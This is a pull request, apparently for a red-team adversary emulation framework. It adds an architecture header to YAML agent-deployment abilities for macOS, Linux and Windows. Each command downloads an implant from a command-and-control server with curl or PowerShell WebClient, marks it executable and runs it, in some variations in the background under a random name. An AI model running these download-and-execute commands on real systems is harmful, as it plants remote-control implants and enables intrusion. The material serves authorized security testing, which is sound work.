### PR TITLE
Add architecture field to agent deployment commands

### DIFF
--- a/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
+++ b/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
@@ -14,7 +14,7 @@
           server="#{app.contact.http}";
           socket="#{app.contact.tcp}";
           contact="tcp";
-          curl -s -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download > #{agents.implant_name};
+          curl -s -X POST -H "file:manx.go" -H "platform:darwin" -H "architecture:#{agents.architecture}" $server/file/download > #{agents.implant_name};
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
         variations:
@@ -23,7 +23,7 @@
               server="#{app.contact.http}";
               socket="#{app.contact.udp}";
               contact="udp";
-              curl -s -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download > #{agents.implant_name};
+            curl -s -X POST -H "file:manx.go" -H "platform:darwin" -H "architecture:#{agents.architecture}" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
           - description: Download with a random name and start as a background process
@@ -31,7 +31,7 @@
               server="#{app.contact.http}";
               socket="#{app.contact.tcp}";
               contact="tcp";
-              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+            agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:darwin" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -http $server -socket $socket -contact $contact &
     linux:
       sh:
@@ -39,7 +39,7 @@
           server="#{app.contact.http}";
           socket="#{app.contact.tcp}";
           contact="tcp";
-          curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > #{agents.implant_name};
+        curl -s -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download > #{agents.implant_name};
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
         variations:
@@ -48,14 +48,14 @@
               server="#{app.contact.http}";
               socket="#{app.contact.udp}";
               contact="udp";
-              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+            agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -http $server -socket $socket -contact $contact &
           - description: Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
               socket="#{app.contact.tcp}";
               contact="tcp";
-              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+            agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -http $server -socket $socket -contact $contact &
     windows:
       psh:
@@ -66,7 +66,8 @@
           $contact="tcp";
           $url="$server/file/download";
           $wc=New-Object System.Net.WebClient;
-          $wc.Headers.add("platform","windows");
+          $wc.Headers.add("platform","windows")
+          $wc.Headers.add("architecture","#{agents.architecture}");
           $wc.Headers.add("file","manx.go");
           $data=$wc.DownloadData($url);
           Get-Process | ? {$_.Path -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f -ea $ErrAction;
@@ -83,6 +84,7 @@
               $url="$server/file/download";
               $wc=New-Object System.Net.WebClient;
               $wc.Headers.add("platform","windows");
+              $wc.Headers.add("architecture","#{agents.architecture}");
               $wc.Headers.add("file","manx.go");
               $data=$wc.DownloadData($url);
               Get-Process | ? {$_.Path -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f -ea $ErrAction;

--- a/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
+++ b/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
@@ -23,7 +23,7 @@
               server="#{app.contact.http}";
               socket="#{app.contact.udp}";
               contact="udp";
-            curl -s -X POST -H "file:manx.go" -H "platform:darwin" -H "architecture:#{agents.architecture}" $server/file/download > #{agents.implant_name};
+              curl -s -X POST -H "file:manx.go" -H "platform:darwin" -H "architecture:#{agents.architecture}" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
           - description: Download with a random name and start as a background process
@@ -31,7 +31,7 @@
               server="#{app.contact.http}";
               socket="#{app.contact.tcp}";
               contact="tcp";
-            agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:darwin" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:darwin" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -http $server -socket $socket -contact $contact &
     linux:
       sh:
@@ -39,7 +39,7 @@
           server="#{app.contact.http}";
           socket="#{app.contact.tcp}";
           contact="tcp";
-        curl -s -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download > #{agents.implant_name};
+          curl -s -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download > #{agents.implant_name};
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
         variations:
@@ -48,14 +48,14 @@
               server="#{app.contact.http}";
               socket="#{app.contact.udp}";
               contact="udp";
-            agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -http $server -socket $socket -contact $contact &
           - description: Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
               socket="#{app.contact.tcp}";
               contact="tcp";
-            agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" -H "architecture:#{agents.architecture}" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -http $server -socket $socket -contact $contact &
     windows:
       psh:
@@ -66,7 +66,7 @@
           $contact="tcp";
           $url="$server/file/download";
           $wc=New-Object System.Net.WebClient;
-          $wc.Headers.add("platform","windows")
+          $wc.Headers.add("platform","windows");
           $wc.Headers.add("architecture","#{agents.architecture}");
           $wc.Headers.add("file","manx.go");
           $data=$wc.DownloadData($url);


### PR DESCRIPTION
## Description

Adds an architecture field to manx agent deployment commands. This makes it easier to compile for non-x86-64 systems such as recent Macs.

## Type of change

- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?

Ran the server, opened the modal and inspected visually.

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [x] I have added tests that prove my fix is effective or that my feature works
